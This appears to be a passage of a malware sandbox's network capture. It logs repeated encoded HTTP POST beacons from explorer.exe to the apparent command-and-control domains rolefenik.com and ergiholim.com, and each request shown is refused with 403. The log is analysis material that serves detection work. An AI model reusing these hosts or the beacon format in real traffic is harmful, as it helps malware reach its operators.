                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20706d7f217360-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=146625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21544&cwnd=32&unsent_bytes=0&cid=0b7508a203288348&ts=777&x=0"
2024-11-13 17:21:37 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49990 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:39 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:39 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:40 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kTvOMavf26j1iibm1aSLNkzSrTHJ8zo2tNPLS68zGmD%2BfBCIeeV3uyXhVPjENEDSaF4%2BAvd1dGcxExeHj50dKOy6xyKwUrt3BBOxihOWux85w04LhCEpHpEnvw%2FYeLr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20707d7b97687c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137050&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21240&cwnd=32&unsent_bytes=0&cid=6d163f834ae258d8&ts=721&x=0"
2024-11-13 17:21:40 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49991 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:40 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:40 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:41 UTC | 741 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FoVGZDhveVTAhV2V2m28QmslPRgNuEg8payeIAXYhRkthudPxLd8lPmCyoa5wM1CMOJxbUQJQNt9XlAgDyDVXw2iB7BrQbwltLsTk4gmsp0CGF6U2nGMBKJQ0Y4zOTi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207085f9bfc978-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33715&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=85957&cwnd=32&unsent_bytes=0&cid=bbef187e0638ecd2&ts=388&x=0"
2024-11-13 17:21:41 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49992 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:42 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:42 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:42 UTC | 749 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2XnpGIVOuyZm0HGEfwSQ0Q8T1xsObXEkw69DoSwhCZyAfkuH7RYWI7ioxkP8mMSwlI03SlrAhN0sQHYSaww5IGme35dsqq2uVKuRNNbZGWdU%2FbCTv9%2B92hK5%2B%2Bds1vQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070907ae6c93c-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33277&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=87355&cwnd=32&unsent_bytes=0&cid=3ad56ecc8f4f2042&ts=272&x=0"
2024-11-13 17:21:42 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49993 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:43 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:43 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:44 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sEfjc1YARPcS6W99KkJZOg28uaSWtwd8isRR8YSuYlkL9DEnP0nM2C94XtEWCbqN4Xvxa%2Fvzw3%2BmdN4%2B0QyqPv%2FFDKM3OPiMQFNtORO5DhKjzkg64Cz0Gw5dxDurxycM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070983c39e375-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=158580&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=19444&cwnd=32&unsent_bytes=0&cid=dce779f60aff2a93&ts=829&x=0"
2024-11-13 17:21:44 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49994 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:45 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:45 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:46 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofAS9CWcRnsUuY8sB%2BNZ3KUKUy%2B7LIgaz%2FpEKSThvs8vExT2XEmCF4kjcY5ur1T6yd6CwAXzCT0vQaManc5VhXa0oFDt28gG5sWvjwmeaQzLSNR%2F64kaAkigl3fjAZ3r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070a3df49687d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=208354&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=13997&cwnd=32&unsent_bytes=0&cid=26dade2761e9e9bf&ts=819&x=0"
2024-11-13 17:21:46 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49995 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:47 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:47 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:47 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:47 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjccpWFZ2%2BSO3q7Tf0NB4hxSNVvPs5%2FO0GPYhl3V%2FGZ40642403UL%2B81Ktxplc4LLHKemvBRWZxon68%2BvaPxzfDMxNOuSd0hN4djUztdDAO4fNxgMs4Q2K2iZEIGe4e1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070b00bc1e375-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152280&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=18737&cwnd=32&unsent_bytes=0&cid=dc5a5657835f4ce6&ts=561&x=0"
2024-11-13 17:21:47 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49996 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:48 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:48 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:49 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zew1z8nhqT7Mps836AToGZCOSuKUIhmI%2BkmFNSyvpeVX7pbAZqOU8cc4NM0GdP8qcy769dILlYhLYo8msyz74AJlYk1UH%2BQX4RxLBXN6SWpGTSt1dKAit3bP7gjNP81W"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070b759fbe7bb-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2494401&cwnd=251&unsent_bytes=0&cid=e116614cf5528425&ts=458&x=0"
2024-11-13 17:21:49 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49997 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:50 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:50 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:50 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9RBqCEpsJKUB%2FQrKMYVUwOqrqSTQo2vXTrKhY2HbSTd5GJRD5rQo%2Fb1tC8afRJv%2FbJZQ033hPMPDmKlz%2FeYorlRTsBOSIWlT%2BgnSq5eNI6MOjvSGoI%2BGufFKlfiAjTs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070c07f6fe38e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=148683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=18751&cwnd=32&unsent_bytes=0&cid=5395202ae9657594&ts=837&x=0"
2024-11-13 17:21:50 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49998 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:51 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:51 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:52 UTC | 746 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNrGzA4RClqk3Zu5u%2FMf8hLl1SIFqqSMfqaf%2BIEm8wZIgoUm11bHGdri1SJFcFXrgR5z1bhzpXXCyDDHPELuB28zw72BszNWuIjjs5EydDGVTfRoySMFuYnbBDxz6X9O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070cb49c0f62d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=139803&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22149&cwnd=32&unsent_bytes=0&cid=04e37b94cd00d38d&ts=723&x=0"
2024-11-13 17:21:52 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 50000 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:55 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:55 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:55 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:55 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E10ETFR%2BTlXuEai8SejHu6VpoufOU8kUaplQ6%2FvUBi56yf9nJiOlj0GVIj%2F%2B1Kr4gOb1I9bjFuAM2AAD5nLCFdETvP6p5bYL67UxhgjkCVZfg7CYxtCLtvvf3sDEo4S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070e12e0ad75f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=143441&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=19733&cwnd=32&unsent_bytes=0&cid=23631287cfa01ef7&ts=740&x=0"
2024-11-13 17:21:55 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 50001 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
